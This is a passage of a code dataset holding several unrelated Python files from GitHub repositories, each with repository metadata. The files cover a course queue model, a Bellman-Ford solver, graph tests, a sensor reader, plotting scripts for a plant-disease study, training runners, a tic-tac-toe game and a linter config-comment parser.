indicate whether it successed or not.\n str --> the message\n A list of Queue that the user is in this quarter.\n \"\"\"\n ec_list = EnrolledCourse.find_courses_user_in(user_id=user_id)\n if not ec_list:\n return (False, \"User not found in any course\", None)\n q_id_list = []\n for ec in ec_list:\n q = Course.get_course_by_id(ec.course_id).id\n q_id_list.append(q)\n q_list = []\n for q_id in q_id_list:\n q = Queue.query.filter_by(id=q_id).first()\n q_list.append(q)\n return (True, \"Success\", q_list)\n\n @staticmethod\n def find_queue_for_course(course_id: int) -> (bool, Optional[Queue]):\n \"\"\"\n Find the queue corresponding for a course.\n Inputs:\\n\n course --> the Course object to look for.\n Returns:\\n\n The queue for that course, if a queue does not exist, None is return.\\n\n \"\"\"\n q_id = Course.get_queue_id_by_id(course_id)\n q = Queue.query.filter_by(id=q_id).first()\n if q:\n return True, q\n else:\n return False, q\n\n @staticmethod\n def get_all_feedback_for_queue(queue_id: int) -> List[TicketFeedback]:\n \"\"\"\n Get a list of ticketfeedback for the queue.\\n\n Input:\\n\n queue_id --> The id of the queue\n Returns:\\n\n A list of ticket feedback.\n \"\"\"\n return Ticket.find_all_feedback_for_queue(queue_id)\n\n @staticmethod\n def get_feedback_for_grader(queue_id: int,\n grader_id: int) -> List[TicketFeedback]:\n \"\"\"\n Get a list of ticket feedbacks to the grader.\\n\n Inputs:\\n\n queue_id --> The id of teh queue\n grader_id --> The id of the grader.\n Returns:\\n\n A list of tickect feedbacks\n \"\"\"\n return Ticket.find_feedback_for_grader(queue_id=queue_id,\n grader_id=grader_id)\n\n @staticmethod\n def get_feedback_for_student(queue_id: int,\n student_id: int) -> List[TicketFeedback]:\n \"\"\"\n Get a list of ticket feedbacks to the grader.\\n\n Inputs:\\n\n queue_id --> The id of teh queue\n grader_id --> The id of the grader.\n Returns:\\n\n A list of tickect feedbacks\n \"\"\"\n return Ticket.find_feedback_for_grader(queue_id=queue_id,\n student_id=student_id)\n","repo_name":"trulyronak/chessboard","sub_path":"project/src/models/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":31964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30329622488","text":"def bellman_ford(G, V, r):\n dist = [float(\"inf\") for _ in range(V)]\n dist[r] = 0\n\n for i in range(V):\n for s, t, d in G:\n if dist[t] > dist[s] + d:\n dist[t] = dist[s] + d\n if i == V - 1:\n print(\"NEGATIVE CYCLE\")\n return\n\n for i in range(V):\n print(\"INF\" if dist[i] == float(\"inf\") else dist[i])\n\n\nV, E, r = map(int, input().split())\nG = []\nfor i in range(E):\n s, t, d = map(int, input().split())\n G.append((s, t, d))\n\nbellman_ford(G, V, r)\n","repo_name":"aiutarsi/Grad-Thesis-Investigation","sub_path":"codes/ans15.py","file_name":"ans15.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70507573332","text":"import unittest\nfrom Tests.testsUtils import *\n\n\nclass TestGraphCreation(unittest.TestCase):\n\n def test_graph_creation(self):\n for i in range(0, 5):\n directed, nodes, edges = generate_random_params()\n graph = Graph(directed, nodes, edges)\n self.assertEqual(directed, graph.directed)\n self.assertEqual(edges, graph._edges_list)\n self.assertEqual(nodes, graph._nodes_list)\n\n def test_graph_creation_by_strings(self):\n for i in range(0, 5):\n directed, nodes_str, edges_str = generate_random_params_strings()\n graph = Graph.create_graph_from_strings(directed,\n nodes_str,\n edges_str)\n nodes = []\n edges = []\n for node in nodes_str.split():\n nodes.append(Node(int(node)))\n for pair in edges_str.split():\n pair = pair.split(\",\")\n edges.append(Edge(Node(int(pair[0])),\n Node(int(pair[1]))))\n self.assertEqual(directed, graph.directed)\n self.assertEqual(nodes, graph._nodes_list)\n self.assertEqual(edges, graph._edges_list)\n\n\n def test_ununiq_nodes_ids(self):\n nodes_ununiq_ids = [Node(randint(1,100)), Node(randint(1,100))]\n nodes_ununiq_ids.append(nodes_ununiq_ids[randint(0,1)])\n edges = [Edge(nodes_ununiq_ids[0],\n nodes_ununiq_ids[1])]\n try:\n graph = Graph(False, nodes_ununiq_ids,\n edges)\n assert False;\n except GraphCreationException as exception:\n self.assertEqual(type(exception) == GraphCreationException, True)\n\n def test_edge_creation(self):\n try:\n params = (Node(1), \"\")\n edge = Edge(node_in=params[0], node_out=params[1])\n raise False\n except EdgeCreationException as exception:\n self.assertEqual(type(exception) == EdgeCreationException, True)\n try:\n params = (None, Node(1))\n edge = Edge(params[0], params[1])\n raise False\n except EdgeCreationException as exception:\n self.assertEqual(type(exception) == EdgeCreationException, True)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mMatvey/graphs-framework","sub_path":"Tests/testGraphCreation.py","file_name":"testGraphCreation.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1670645012","text":"from machine import SPI, Pin\nfrom bme680 import BME680_SPI\n\ndef get_bme680_data():\n bme680_data = {\n 'temperature': None,\n 'humidity': None,\n 'pressure': None,\n 'gas': None,\n 'altitude': None,\n }\n\n # Configuration #1: see breadboard.py\n #spi = SPI(0, mode=SPI.MASTER, baudrate=2000000, polarity=0, phase=0, pins=('P4','P20','P19'))\n # Configuration #2: see breadboard.py\n spi = SPI(0, mode=SPI.MASTER, baudrate=2000000, polarity=0, phase=0, pins=('P20','P19','P18'))\n cs = Pin('P3', Pin.OUT, value=1)\n bme = BME680_SPI(spi, cs)\n\n bme.sea_level_pressure = 1013.25\n temperature_offset = -5\n\n bme680_data['temperature'] = '{}'.format(bme.temperature)\n bme680_data['humidity'] = '{}'.format(bme.humidity)\n bme680_data['pressure'] = '{}'.format(bme.pressure)\n bme680_data['gas'] = '{}'.format(bme.gas)\n bme680_data['altitude'] = '{}'.format(bme.altitude)\n\n return bme680_data\n\n# vim: ai et ts=4 sts=4 sw=4 nu\n","repo_name":"johnedstone/pycom-gpy","sub_path":"projects/post_json_data/lib/helper_bme680.py","file_name":"helper_bme680.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41962194071","text":"# https://atcoder.jp/contests/agc009/submissions/42066508\n\nn = int(input())\na = []\nb = []\nfor _ in range(n):\n x, y = map(int, input().split())\n a.append(x)\n b.append(y)\n\nans = 0\nwhile len(a) > 0: ans += (b[-1] - (a.pop() + ans) % b[-1]) % b.pop()\nprint(ans)\n","repo_name":"tawainfer/atcoder-submission","sub_path":"agc/agc009/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40761544782","text":"# -*- coding: utf-8 -*-\n# @Time : 2022/10/25 下午12:27\n# @Author : weather\n# @Software: PyCharm\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport glob\nimport os\nimport numpy as np\nimport random\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom PIL import Image\nplt.rcParams['font.family']= 'Times New Roman'\n\n\ndef data_statistics_bar_plot():\n def get_data(root_dir):\n image_number = {}\n for fn in os.listdir(root_dir):\n search = os.path.join(root_dir, fn, '*')\n images = glob.glob(search)\n image_number[fn] = len(images)\n df = pd.DataFrame.from_dict({'diseases': image_number.keys(),\n 'image_number': image_number.values()})\n return df\n\n def field_lab_df(field_floder, lab_folder):\n field_df = get_data(field_floder)\n field_df.columns = ['diseases', 'Field']\n lab_df = get_data(lab_folder)\n lab_df.columns = ['diseases', 'Lab']\n res = pd.merge(field_df, lab_df)\n return res\n\n field_folder = '../data/original_datasets/merged_datasets/field/'\n lab_folder = '../data/original_datasets/merged_datasets/lab/'\n res = field_lab_df(field_folder, lab_folder)\n res = res.sort_values(by='diseases')\n ax = res.plot(kind='bar', stacked=True,\n color=['Tab:red', 'Tab:blue'])\n xlabel = res.diseases.str.replace('_', ' ')\n ax.set_xticklabels(xlabel)\n ax.bar_label(ax.containers[0],\n label_type='center', fontsize=8)\n ax.bar_label(ax.containers[1],\n label_type='center', fontsize=8)\n plt.legend(fontsize=10, frameon=True)\n plt.xlabel('Diseases name', fontsize=12)\n plt.ylabel('Image number', fontsize=12)\n plt.tight_layout()\n plt.savefig('../fig/original_data_statistics.bar.png', dpi=300)\n plt.show()\n\n\ndef train_acc_loss_plot():\n folders = ['../data/lab/', '../data/field/', '../data/mixed/']\n csv_files = []\n for fld in folders:\n cf = sorted(glob.glob(fld + 'output/*loss*csv'))\n csv_files.extend(cf)\n\n plt.rcParams['ytick.labelsize'] = 12\n plt.rcParams['xtick.labelsize'] = 12\n fig, axs = plt.subplots(nrows=3, ncols=3, facecolor='w', figsize=(12, 12))\n axs = axs.flatten()\n for i, path in enumerate(csv_files):\n df = pd.read_csv(path, index_col=0)\n if i < 3:\n df = df.iloc[:15, ]\n xlim = df.shape[0]\n l1 = axs[i].plot(range(1, xlim + 1), df['train_acc'], lw=2, color='#F65429', label='Train Acc')\n l2 = axs[i].plot(range(1, xlim + 1), df['val_acc'], lw=2, color='#DB3725', label='Val Acc')\n axs[i].set_ylim(0, 1.1)\n axs[i].set_yticks(ticks=np.arange(0, 1.05, 0.1))\n\n ax1 = axs[i].twinx()\n l3 = ax1.plot(range(1, xlim + 1), df['train_loss'], lw=2, color='#3D93C5', label='Train Loss')\n l4 = ax1.plot(range(1, xlim + 1), df['val_loss'], lw=2, color='#3382A3', label='Val Loss')\n\n lns = l1 + l2 + l3 + l4\n labels = [l.get_label() for l in lns]\n\n plt.xticks(ticks=range(1, xlim + 1, 3))\n\n axs[i].grid(ls='-.')\n\n axs[0].legend(lns, labels, fontsize=12, loc=7)\n\n axs[0].set_ylabel('Lab', fontsize=16)\n axs[3].set_ylabel('Field', fontsize=16)\n axs[6].set_ylabel('Mixed', fontsize=16)\n\n axs[6].set_xlabel('EfficientNet B0', fontsize=16)\n axs[7].set_xlabel('MobileNet V3s', fontsize=16)\n axs[8].set_xlabel('ResNet 34', fontsize=16)\n\n plt.tight_layout()\n plt.savefig('../fig/train_acc_loss.png', dpi=300)\n plt.show()\n\n\ndef cross_test_plot():\n predict_path = sorted(glob.glob('../data/cross_tested/*csv'))\n models = [path.split('/')[-1].split('_')[0] for path in predict_path]\n sources = [path.split('/')[-1].split('_')[1] for path in predict_path]\n targets = [path.split('/')[-1].split('_')[2][:-4] for path in predict_path]\n f = lambda x: x.split('/')[-2]\n accs = []\n for fn in predict_path:\n df = pd.read_csv(fn, index_col=0)\n df['true_label'] = df['img'].apply(f)\n acc = accuracy_score(df['true_label'], df['cla'])\n accs.append(acc)\n result = pd.DataFrame({'models': models, 'sources': sources, 'targets': targets, 'acc': accs})\n field = result[result['sources'] == 'field']\n lab = result[result['sources'] == 'lab']\n mixed = result[result['sources'] == 'mixed']\n\n from matplotlib.pyplot import bar\n plt.rcParams['ytick.labelsize'] = 12\n colors = {'lab': '#AE3D3A', 'mixed': '#3382A3', 'field': '#304E6C'}\n models_labels = ['EfficientNet B0', 'MobileNet V3 Small', 'ResNet34']\n\n fig, axs = plt.subplots(nrows=1, ncols=3, sharex=True, figsize=(15, 5), facecolor='w')\n # lab on field\n b1 = axs[0].bar(x=np.arange(3) - 0.1, height=lab['acc'].values[0::2], width=0.2, color=colors['field'],\n label='Test on Field')\n b2 = axs[0].bar(x=np.arange(3) + 0.1, height=lab['acc'].values[1::2], width=0.2, color=colors['mixed'],\n label='Test on Mixed')\n axs[0].set_ylim(0, 1)\n axs[0].set_ylabel('Accuracy', fontsize=14)\n axs[0].set_title('Train on Lab', fontsize=16)\n axs[0].set_xticks([0, 1.05, 2], labels=models_labels, fontsize=14)\n axs[0].xaxis.set_ticks_position('none')\n\n b3 = axs[1].bar(x=np.arange(3) - 0.1, height=mixed['acc'].values[0::2], width=0.2, color=colors['field'],\n label='Test on Field')\n b4 = axs[1].bar(x=np.arange(3) + 0.1, height=mixed['acc'].values[1::2], width=0.2, color=colors['lab'],\n label='Test on Lab')\n print(mixed['acc'].values[1::2])\n axs[1].set_ylim(0, 1)\n axs[1].set_ylabel('Accuracy', fontsize=14)\n axs[1].set_title('Train on Mixed', fontsize=16)\n axs[1].set_xticks([0, 1.05, 2], labels=models_labels, fontsize=14)\n axs[1].xaxis.set_ticks_position('none')\n b5 = axs[2].bar(x=np.arange(3) - 0.1, height=field['acc'].values[0::2], width=0.2, color=colors['lab'],\n label='Test on '\n 'Lab')\n b6 = axs[2].bar(x=np.arange(3) + 0.1, height=field['acc'].values[1::2], width=0.2, color=colors['mixed'],\n label='Test '\n 'on '\n 'Mixed')\n axs[2].set_ylim(0, 1)\n axs[2].set_ylabel('Accuracy', fontsize=14)\n axs[2].set_title('Train on Field', fontsize=16)\n\n axs[2].set_xticks([0, 1.05, 2], labels=models_labels, fontsize=14)\n axs[2].xaxis.set_ticks_position('none')\n\n legends = [bar([0], [0], color=colors['field'], label='Test on Field'),\n bar([0], [0], color=colors['mixed'], label='Test on Mixed'),\n bar([0], [0], color=colors['lab'], label='Test on Lab')]\n axs[2].legend(handles=legends, loc=0, frameon=False, fontsize=16)\n\n axs[0].bar_label(b1, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[0].bar_label(b2, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[1].bar_label(b3, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[1].annotate('0.976', xy=(0.2, 0.9), fontsize=12)\n axs[1].annotate('0.965', xy=(1.2, 0.9), fontsize=12)\n axs[1].annotate('0.981', xy=(1.8, 0.9), fontsize=12)\n axs[2].bar_label(b5, label_type='edge', fmt=\"%.3f\", fontsize=12)\n axs[2].bar_label(b6, label_type='edge', fmt=\"%.3f\", fontsize=12)\n\n plt.yticks(fontsize=14)\n plt.tight_layout()\n plt.savefig('../fig/cross_test_row.png', dpi=300)\n # plt.savefig('../fig/cross_test_row.tiff', dpi=300)\n plt.show()\n\n\ndef get_partial_data2frame():\n train_val_fns = sorted(glob.glob('../data/partial/*/output/*acc*csv'))\n val_accs = []\n for fn in train_val_fns:\n df = pd.read_csv(fn, index_col=0)\n val_accs.append(df.val_acc.max())\n test_fns = sorted(glob.glob('../data/partial/*/output/*predict*.csv'))\n test_acc = []\n for fn in test_fns:\n df = pd.read_csv(fn, index_col=0)\n df['true_label'] = df.img.apply(lambda x: x.split('/')[4])\n tsc = accuracy_score(df.true_label, df.cla)\n test_acc.append(tsc)\n models = ['Efficient', 'MobileNet', 'ResNet'] * 10\n a = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n a = np.asarray(a).reshape(-1, 1)\n a = a.repeat(3, axis=1).flatten().tolist()\n df = pd.DataFrame.from_dict({'percent': a, 'models': models, 'val acc': val_accs, 'test acc': test_acc})\n\n field_csvs = sorted(glob.glob('../data/part_test_on_field/*/*csv'))\n field_acc = []\n for fn in field_csvs:\n df = pd.read_csv(fn, index_col=0)\n df['true_label'] = df.img.apply(lambda x: x.split('/')[3])\n fsc = accuracy_score(df.true_label, df.cla)\n field_acc.append(fsc)\n f_res = pd.DataFrame.from_dict({'percent': a, 'models': models, 'acc': field_acc})\n return df, f_res\n\n\ndef partial_valid_test_acc_plot():\n df, _ = get_partial_data2frame()\n colors = ['#F65429', '#EED364', '#3382A3']\n sns.set_palette(sns.color_palette(colors))\n p1 = sns.lineplot(x='percent', y='val acc', hue='models', data=df, marker='*', lw=2, ms=12, legend=True)\n sns.lineplot(x='percent', y='test acc', hue='models', data=df, marker='o', lw=1.5, ms=6, alpha=0.7, legend=False)\n handles, _ = p1.get_legend_handles_labels()\n l1 = plt.legend(handles=handles, labels=['EfficientNet B0', 'MobileNet V3 Small', 'ResNet 34'], frameon=False,\n fontsize=12, bbox_to_anchor=[0.55, 0.5])\n custom_scatter = [plt.scatter(0, 0, marker='*', label='Validation Accuracy', color='k'),\n plt.scatter(0, 0, marker='o', label='Test Accuracy', color='k')]\n l2 = plt.legend(handles=custom_scatter, fontsize=12, frameon=False, bbox_to_anchor=[0.55, 0.3])\n\n p1.add_artist(l1)\n p1.add_artist(l2)\n\n plt.xticks(ticks=np.arange(1, 11, 1), labels=['{}%'.format(i) for i in range(10, 110, 10)], fontsize=12)\n plt.xlabel('Percentage', fontsize=14)\n plt.ylabel('Accuracy', fontsize=14)\n plt.savefig('../figs/lab_add2field_val_test_acc.png', dpi=300)\n plt.show()\n\n\ndef partial_test_on_filed_plot():\n _ , df = get_partial_data2frame()\n sns.lineplot(x=df['percent'], y=df['acc'], hue='models', linewidth=2,\n marker='*', ms=12, data=df)\n plt.legend(labels=['EfficientNet B0', 'MobileNet V3 Small', 'ResNet 34'], frameon=False, fontsize=12, loc=[0.5, 0.25])\n plt.xticks(ticks=np.arange(1, 11, 1), labels=['{}%'.format(i) for i in range(10, 110, 10)], fontsize=12)\n plt.xlabel('Percentage', fontsize=14)\n plt.ylabel('Accuracy', fontsize=14)\n plt.savefig('../figs/percent_test_on_field.png', dpi=300)\n plt.show()\n\n\ndef get_diseases2frame(criterion):\n total_test_fns = sorted(glob.glob(criterion))\n dfs = []\n for path in total_test_fns:\n condition = path.split('/')[0][2:]\n model = path.split('/')[-1].split('_')[0]\n df = pd.read_csv(path, index_col=0)\n df['true_label'] = df['img'].apply(lambda x: x.split('/')[3])\n matrix = confusion_matrix(df['true_label'], df['cla'], normalize='true')\n results = pd.DataFrame.from_dict({'diseases': df['true_label'].unique(), 'accuracy': matrix.diagonal()})\n results = results.sort_values(by='diseases', ascending=True)\n results['condition'] = condition\n results['model'] = model\n dfs.append(results)\n total = pd.concat(dfs, axis=0)\n total = total.reset_index(drop=True)\n return total\n\n\ndef get_diseases_individual2frame():\n limits_fns = sorted(glob.glob('./plant_individual/*/*/output/*predict_test.csv'))\n dfs = []\n for path in limits_fns:\n condition = path.split('/')[2]\n model = path.split('/')[-1].split('_')[0]\n df = pd.read_csv(path, index_col=0)\n df['true_label'] = df['img'].apply(lambda x: x.split('/')[5])\n matrix = confusion_matrix(df['true_label'], df['cla'], normalize='true')\n results = pd.DataFrame.from_dict({'diseases': df['true_label'].unique(), 'accuracy': matrix.diagonal()})\n results = results.sort_values(by='diseases', ascending=True)\n results['condition'] = condition\n results['model'] = model\n dfs.append(results)\n limit_df = pd.concat(dfs, axis=0)\n limit_df = limit_df.reset_index(drop=True)\n return limit_df\n\n\ndef diseases_acc_plot():\n total = get_diseases2frame(criterion='./*/output/*test.csv')\n limit_df = get_diseases_individual2frame()\n diseases = total.diseases.unique().tolist()\n diseases = [dis.replace('_', ' ') for dis in diseases]\n\n print(total.shape)\n print(limit_df.shape)\n\n plt.rcParams['xtick.labelsize'] = 12\n plt.rcParams['ytick.labelsize'] = 12\n fig, axs = plt.subplots(nrows=1, ncols=6, sharey=True, figsize=(8, 6), facecolor='w')\n i = 0\n for md in ['EfficientNet', 'MobileNetV3', 'ResNet']:\n tdf = total[total['model'] == md]\n ldf = limit_df[limit_df['model'] == md]\n tdata = tdf.accuracy.values.reshape(3, -1).T\n ldata = ldf.accuracy.values.reshape(3, -1).T\n p1 = axs[i].imshow(tdata, cmap='coolwarm_r')\n p2 = axs[i + 1].imshow(ldata, cmap='coolwarm_r')\n axs[i].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n axs[i + 1].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n axs[i].set_yticks(range(0, 14, 1), diseases)\n axs[i + 1].set_yticks(range(0, 14, 1), diseases)\n axs[i].set_title('a')\n axs[i + 1].set_title('b')\n i += 2\n\n plt.tight_layout()\n fig.text(0.3, 0.15, 'EfficientNet B0', fontsize=12)\n fig.text(0.48, 0.15, 'MobileNet V3 Small', fontsize=12)\n fig.text(0.71, 0.15, 'ResNet 34', fontsize=12)\n fig.colorbar(p2, ax=axs, shrink=0.6)\n\n plt.savefig('../figs/diseases_acc_change.png', dpi=300)\n plt.show()\n\n\ndef precision_recall_f1_plot():\n \"\"\"\n many data are impposible to make tables\n :return:\n \"\"\"\n fns = sorted(glob.glob('../data/tables/?????_[!v]*'))\n dfs = []\n for fn in fns:\n model = fn.split('_')[2][:-4]\n cond = fn.split('_')[1]\n df = pd.read_csv(fn, index_col=0)\n df = df.iloc[:-3, :-1]\n df['conditions'] = cond\n df['models'] = model\n dfs.append(df)\n res = pd.concat(dfs, axis=00)\n\n colors =['#AE3D3A', '#3382A3', '#304E6C']\n fig, axs = plt.subplots(nrows=3, ncols=1, sharex=True, figsize=(6, 16))\n\n for i, cla in enumerate(['precision', 'recall', 'f1-score']):\n legend = False\n if i == 0:\n legend = True\n s = sns.scatterplot(x=res.index, y=res[cla], hue='conditions', style='models', data=res, palette=colors, ax=axs[i], legend=legend)\n labels = [name.replace('_', ' ') for name in res.index.unique().tolist()]\n s.set_xticks(ticks=range(0, 14), labels=labels, rotation=90, fontsize=14)\n s.set_ylabel(cla.capitalize().replace('-', ' '), fontsize=14)\n s.legend(ncol=2, frameon=False, fontsize=10, bbox_to_anchor=[0.5, 0.35])\n plt.tight_layout()\n plt.savefig('../fig/total_prf.svg', dpi=600)\n plt.show()\n\n\ndef cam_plot():\n origin = sorted(glob.glob('../data/cam_maps/origin_test/*/*'))\n model_folders = sorted(glob.glob('../data/cam_maps/[!c]*[!t]'))\n images_list = {}\n for fld in model_folders:\n criterion = os.path.join(fld, '*', '*')\n images = sorted(glob.glob(criterion))\n images_list[fld] = images\n\n # random.seed(46)\n # random_index = random.choices(range(4450), k=40)\n select = [4216, 2798, 3813, 810, 98, 265, 256, 307]\n titles = [key[2:].replace('_', ' on ') for key in images_list.keys()]\n titles = ['EfficientNet-Field', 'EfficientNet-Lab', 'EfficientNet-Mixed', 'MobileNet-Field', 'MobileNet-Lab',\n 'MobileNet-Mixed', 'ResNet-Field', 'ResNet-Lab', 'ResNet-Mixed']\n\n fig, axs = plt.subplots(ncols=10, nrows=8, figsize=(14, 12), facecolor='w')\n for i, idx in enumerate(select):\n img1_path = origin[idx]\n img1 = Image.open(img1_path)\n w, h = img1.size\n left = (w - 224) / 2\n top = (h - 224) / 2\n right = (w + 224) / 2\n bottom = (h + 224) / 2\n img_resize = img1.crop((left, top, right, bottom))\n axs[i, 0].imshow(img_resize)\n axs[i, 0].axis('off')\n j = 1\n for key, values in images_list.items():\n img2_path = values[idx]\n img2 = plt.imread(img2_path)\n axs[i, j].imshow(img2)\n axs[i, j].axis('off')\n if i == 0:\n axs[i, 0].set_title('Origin', fontsize=12)\n axs[i, j].set_title(titles[j - 1], fontsize=12)\n j += 1\n plt.subplots_adjust(wspace=0.05, hspace=0.05)\n plt.tight_layout()\n plt.savefig('../fig/cam_plot1.svg', dpi=600)\n plt.show()\n\n\ndef precision_recall_f1score_heatmap(columns):\n total_df = pd.read_csv('../data/tables/heatmap_total.csv', index_col=0)\n individual_df = pd.read_csv('../data/tables/heatmap_individual.csv', index_col=0)\n\n diseases = total_df.diseases.unique().tolist()\n diseases = [dis.replace('_', ' ') for dis in diseases]\n\n plt.rcParams['xtick.labelsize'] = 12\n plt.rcParams['ytick.labelsize'] = 12\n fig, axs = plt.subplots(nrows=1, ncols=6, sharey=True, figsize=(8, 6), facecolor='w')\n i = 0\n for md in ['EfficientNet', 'MobileNetV3', 'ResNet']:\n tdf = total_df[total_df['model'] == md]\n ldf = individual_df[individual_df['model'] == md]\n tdata = tdf[columns].values.reshape(3, -1).T\n ldata = ldf[columns].values.reshape(3, -1).T\n p1 = axs[i].imshow(tdata, cmap='coolwarm_r')\n p2 = axs[i + 1].imshow(ldata, cmap='coolwarm_r')\n axs[i].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n axs[i + 1].set_xticks([0, 1, 2], ['Field', 'Mixed', 'Lab'], rotation=60)\n axs[i].set_yticks(range(0, 14, 1), diseases)\n axs[i + 1].set_yticks(range(0, 14, 1), diseases)\n axs[i].set_title('(a)')\n axs[i + 1].set_title('(b)')\n i += 2\n\n plt.tight_layout()\n fig.text(0.27, 0.15, 'EfficientNet B0', fontsize=12)\n fig.text(0.46, 0.15, 'MobileNet V3 Small', fontsize=12)\n fig.text(0.71, 0.15, 'ResNet 34', fontsize=12)\n cbar = fig.colorbar(p2, ax=axs, shrink=0.6)\n cbar.ax.set_ylabel(columns.capitalize().replace('-', ' '), fontsize=14, rotation=270, labelpad=15)\n\n plt.savefig('../fig/heatmap_'+columns+'.png', dpi=300)\n plt.show()\n\n\nif __name__ == '__main__':\n # data_statistics_bar_plot()\n # train_acc_loss_plot()\n # cross_test_plot()\n # partial_valid_test_acc_plot()\n # partial_test_on_filed_plot()\n # diseases_acc_plot()\n # precision_recall_f1_plot()\n # cam_plot()\n precision_recall_f1score_heatmap(columns='f1-score')","repo_name":"weathergit/Lab_field_diseases","sub_path":"src/mk_plots.py","file_name":"mk_plots.py","file_ext":"py","file_size_in_byte":18591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42536156538","text":"from data import batcher\nfrom sklearn.metrics import matthews_corrcoef, precision_score, recall_score\n\n\ndef train_runner(sess, network, train_batch_generator, current_iteration):\n cost_op = network.cost\n train_op = network.train_once\n test_op = network.choices\n\n batch_inputs, batch_targets = next(train_batch_generator)\n training_cross_entropy, train_choices, _ = sess.run([cost_op, test_op, train_op],\n {network.data_input: batch_inputs,\n network.data_targets: batch_targets,\n network.is_training_mode: True})\n train_mathews = matthews_corrcoef(batch_targets, train_choices)\n\n print(\"Iteration %d:\\tTraining Cross Entropy = %f\\tTrain Matthew's = %f\" % (\n current_iteration, training_cross_entropy, train_mathews))\n\n return train_mathews\n\ndef test_runner(sess, network, iterable, batch_size, set_name):\n test_op = network.choices\n test_batch_generator = batcher.TestBatcher(iterable, batch_size)\n all_test_targets = []\n all_test_choices = []\n for batch_inputs, batch_targets in test_batch_generator:\n test_choices = sess.run(test_op, {network.data_input: batch_inputs,\n network.data_targets: batch_targets,\n network.is_training_mode: False})\n all_test_targets.extend(batch_targets)\n all_test_choices.extend(test_choices)\n test_matthews = matthews_corrcoef(all_test_targets, all_test_choices)\n test_precision = precision_score(all_test_targets, all_test_choices)\n test_recall = recall_score(all_test_targets, all_test_choices)\n print(\"%s Matthew's = %f\\tPrecision = %f\\tRecall = %f\" % (set_name, test_matthews, test_precision, test_recall))\n\n return test_matthews\n\nclass ValidationPerformanceTracker:\n #task: if performance did not improve in last N runs, notify\n def __init__(self, track_n):\n self.track_n = track_n\n self.records = []\n self.IDs = []\n\n def get_winning_ID(self, last_result, id):\n if len(self.records) < self.track_n:\n self.records.append(last_result)\n self.IDs.append(id)\n return None\n else:\n self.records.pop()\n self.records.append(last_result)\n self.IDs.pop()\n self.IDs.append(id)\n\n best_index, _ = max(enumerate(self.records), key=lambda item: item[1])\n should_stop = best_index != len(self.records) - 1\n\n if should_stop:\n return self.IDs[best_index]\n else:\n return None","repo_name":"ramibotros/GridLSTM","sub_path":"model/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14328082166","text":"from random import randint\ntabu = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\nwhile True:\n for c in range(0, 9):\n #TABULEIRO\n print('\\033[1;33m=\\033[m'*30)\n for l in range(0, 3):\n for c in range(0, 3):\n print(f'\\033[1;36m{tabu[l][c]:^3}\\033[m', end='|')\n print()\n print('\\033[1;33m=\\033[m'*30)\n #JOGADA\n jogada = int(input('\\033[1;33mQual sua jogada:\\033[m '))\n #CPU\n cpu = randint(1 , 9)\n for l in range(0, 3):\n for c in range(0, 3):\n if jogada == tabu[l][c]:\n tabu[l][c] = 'X'\n\n for l in range(0, 3):\n for c in range(0,3):\n if cpu == tabu[l][c]:\n tabu[l][c] = 'O'\n break\n\n # VENCEDOR JOGADOR\n\n\n\n\n\nprint(f'{tabu[0]}')\nprint(f'{tabu[1]}')\nprint(f'{tabu[2]}')\n","repo_name":"w3ssfs/ExerciciosIniciantePython","sub_path":"Old Game.py","file_name":"Old Game.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35352132392","text":"from vint.ast.node_type import NodeType\nfrom typing import Dict, Any, Optional # noqa: F401\nimport re\nCONFIG_COMMENT_PATTERN = re.compile(r'^\\s*vint:\\s*')\nPOLICY_SWITCH_PATTERN = re.compile(r'(?:^|\\s)[-+]\\S+')\nNEXT_LINE_FLAG_PATTERN = 'next-line'\n\n\nclass ConfigComment:\n def __init__(self, config_dict, is_only_next_line):\n # type: (Dict[str, Any], bool) -> None\n self.config_dict = config_dict\n self.is_only_next_line = is_only_next_line\n\n\ndef parse_config_comment_node_if_exists(node):\n # type: (Dict[str, Any]) -> Optional[ConfigComment]\n if NodeType(node['type']) is not NodeType.COMMENT:\n return None\n\n comment_node = node\n comment_content = comment_node['str']\n\n if not is_config_comment(comment_content):\n return None\n\n return parse_config_comment(comment_content)\n\n\ndef parse_config_comment(comment_content):\n # type: (str) -> Optional[ConfigComment]\n\n if not is_config_comment(comment_content):\n return None\n\n striped_comment_content = CONFIG_COMMENT_PATTERN.sub('', comment_content)\n\n policy_switches = [policy_switch.strip() for policy_switch in POLICY_SWITCH_PATTERN.findall(striped_comment_content)]\n is_only_next_line = NEXT_LINE_FLAG_PATTERN in striped_comment_content\n\n policies = {}\n for policy_switch in policy_switches:\n policy_name = policy_switch[1:]\n is_enabling_switch = policy_switch[0] == '+'\n\n policies[policy_name] = {\n 'enabled': is_enabling_switch\n 